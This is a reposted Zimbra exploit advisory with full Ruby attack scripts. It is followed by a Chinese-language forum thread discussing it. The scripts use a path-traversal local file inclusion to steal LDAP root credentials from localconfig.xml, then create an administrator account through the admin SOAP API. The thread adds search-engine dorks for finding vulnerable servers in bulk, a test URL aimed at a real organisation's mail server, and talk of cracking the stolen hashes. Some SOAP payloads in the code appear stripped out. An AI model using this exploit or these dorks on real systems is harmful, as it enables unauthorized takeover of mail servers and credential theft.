Zimbra - 0day exploit / Privilegie escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00


----------------Exploit-----------------


Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.

use the exploit like this :


ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
    [*] Account   : [email protected]
    [*] Password  : Test123_23
[+] Successfully Exploited !

The number of servers vuln are huge like 80/100.

This is only for educational purpouses.

from

---

影响版本：2009, 2010, 2011, 2012 and early 2013

测试方法：

http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

----------------Exploit-----------------
Before use this exploit, target server must have admin console port open "7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account   : [email protected]
[*] Password  : Test123_23
[+] Successfully Exploited !

run.rb:

# /usr/bin/ruby
#
# Author: Eduardo Rubina H.
# Email : rubina119[at]gmail.com
# Date  : 03 Dec 2013
# State : Critical
#
# Description : This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml
# that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies
# and a lot of stuff also the lfi leets you see .bash_history, ssh pub keys, config files, etc.
#
#
# LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
#
#

require 'net/https'
require 'getoptlong'
require './ultils.rb'

data = nil

def exploit_begin()
puts "[+] Looking if host is vuln..."
http = Net::HTTP.new( $host, 7071 )

http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE

req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } )
 res = http.request( req )

case res
  when Net::HTTPSuccess then
    begin
      if res.header[ 'Content-Encoding' ].eql?( 'gzip' ) then
        sio = StringIO.new( res.body )
        gz = Zlib::GzipReader.new( sio )
    puts "[+] Host is vuln exploiting"
        resbody = gz.read()

        part1 = resbody.gsub("n", ' ').squeeze(' ')
        part2 = part1.gsub("a[", '').squeeze(' ')
        ldap_user = part2.match(/name=\"zimbra_user\">"; "(.*?)/ui)[1]
         ldap_pass = part2.match(/name=\"zimbra_ldap_password\">"; "(.*?)/ui)[1]

        get_auth_token(ldap_user,ldap_pass)

        else
        puts "[-] Host is not vulnerable !"
        return false
  end
  rescue Exception
     #puts "[-] Connection Failed !"
     return false
  end
end

end

def get_auth_token(user,pass)

https = Net::HTTP.new( $host, 7071 )
path = "/service/admin/soap"

https.use_ssl = true
https.verify_mode = OpenSSL::SSL::VERIFY_NONE

body = "
#{user}#{pass}"
 data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action="urn:zimbraAdmin#AuthRequest"" } )
 $auth_key = data.body.match(/(.*)/iu)[1]
exploit()

end

def exploit()

puts "[+] Obtaining Domain Name"
get_domain_soap_data = ""
 get_domain = Utils.new.request_soap_admin(get_domain_soap_data)
domain = get_domain.match(/(.*?)/iu)[1]

puts "[+] Creating Account"
create_account_soap_data = "#{$user}@#{domain}#{$password}"
 create_account = Utils.new.request_soap_admin(create_account_soap_data)
a_id = create_account.match(/account id="(.*)" name="/ui)[1]

puts "[+] Elevating Privileges"
elevate_privs_soap_data = "#{a_id}TRUE"
 elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data)

puts "[+] Login Credentials"
puts "    [*] Login URL : https://#{domain}:7071/zimbraAdmin/ "
puts "    [*] Account   : #{$user}@#{domain}"
puts "    [*] Password  : #{$password}"
puts "[+] Successfully Exploited !"

end

def usage
    print( "
             -t, --target
             Host to attack ip or domain

             -u, --useraccount
             The user name to be used to create the account, only alfanumeric chars.

             -p, --password
                 Password that will be used to create the account,
                 pass needs to be alfanumeric upercase and lowercase and special chars, minchar(8).

             -h, --help
             Print this help message


"
  )
end


puts ""
puts ""
puts "#########################################################################################"
puts "Zimbra Email Collaboration Server 0day Exploit by rubina119"
puts "#########################################################################################"
puts ""
puts ""

opts = GetoptLong.new(

        [ '--target', '-t', GetoptLong::REQUIRED_ARGUMENT ],
        [ '--useraccount','-u', GetoptLong::REQUIRED_ARGUMENT ],
      [ '--password','-p', GetoptLong::REQUIRED_ARGUMENT ],
      [ '--help','-h', GetoptLong::OPTIONAL_ARGUMENT ]
    )
opts.each do |opt, arg|
  case opt
        when '--help'
        usage()
          when '--target'
        $host = arg
         when '--useraccount'
        $user = arg
      when '--password'
        $password = arg
end
end

if $host == nil

usage()

else

exploit_begin()

end

ultils.rb

# /usr/bin/ruby

require 'net/https'

class Utils

def request_soap_admin(api_call)

  @request=api_call

  soap_client = Net::HTTP.new( $host, 7071 )
  soap_client.use_ssl = true
  soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE

  soap_path = "/service/admin/soap"

  soap_data = "
#{$auth_key}
#{@request}"

  response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action="urn:zimbraAdmin"" } )

  if response.body.match(/Error/)
     error_res = response.body.match(/(.*?)/ui)[1]
     puts "[-] Response Error"
     puts "    [*] #{error_res}"
     false
  else
     return response.body
  end


end
end

批量搜索方法:title:zimbra web client sign in (百度下测试一搜索一大片)

虽然有些没开7071但是配置文件还是能被包含出来，不知道里面加密的数据能不能被破解出来

乌云讨论：

1#

火星人 (不会技术活) | 2013-12-09 16:56

批量的、？

2#

生生不息 | 2013-12-09 17:11

又见包含 7071是默认端口就可以批量。

3#

dren | 2013-12-09 17:28

不错

4#

[email protected] | 2013-12-09 18:29

这个真心屌炸天 测试站点：https://mail.ecmwf.int/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

5#

[email protected] | 2013-12-09 18:49

这个真心屌炸天， 可惜默认不是root运行。另外谁知道密码什么加密？

6#

无敌L.t.H (:?门安天京北爱我) | 2013-12-09 19:51

看来一大堆.EDU要中枪

7#

猪猪侠 (A) | 2013-12-09 20:01

@[email protected] OpenLDAP SHA

8#

if、so (no talk,but shell!!) | 2013-12-09 20:11

@猪猪侠 是的

9#

if、so (no talk,but shell!!) | 2013-12-09 20:11

@猪猪侠 刚百度了

10#

circus | 2013-12-09 20:43

@if、so 好东西

11#

circus | 2013-12-09 20:51

@if、so inurl:7071 -intext:7071 inurl:zimbra

12#

circus | 2013-12-09 20:52

inurl:7071 intitle:zimbra administration

13#

[email protected] | 2013-12-09 21:53

没在hashcat里找到适合的密文选项, 尝试ssha 的几乎都失败了。

14#

Jacks | 2013-12-10 01:16

7071端口被改了，有办法找到端口不？ 另外 @猪猪侠 有了LDAP 怎么获取所有用户的HASH呢？

15#

luwikes (土豆你个西红柿，番茄你个马铃薯～～～) | 2013-12-10 09:42

mark

留言评论（旧系统）：

文章来源于lcx.cc:Zimbra - 0day exploit / Privilegie escalation via LFI